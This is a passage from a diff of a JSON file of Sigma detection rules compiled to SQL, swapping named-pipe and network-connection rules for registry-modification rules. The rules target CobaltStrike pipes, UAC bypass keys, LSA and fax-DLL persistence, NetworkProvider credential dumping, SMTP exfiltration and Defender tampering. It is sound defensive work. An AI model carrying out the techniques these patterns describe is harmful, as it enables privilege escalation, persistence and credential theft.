value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "status": "experimental", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], - "falsepositives": [ - "Legitimate script" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" - ], - "filename": "net_connection_win_imewdbld.yml" - }, - { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName 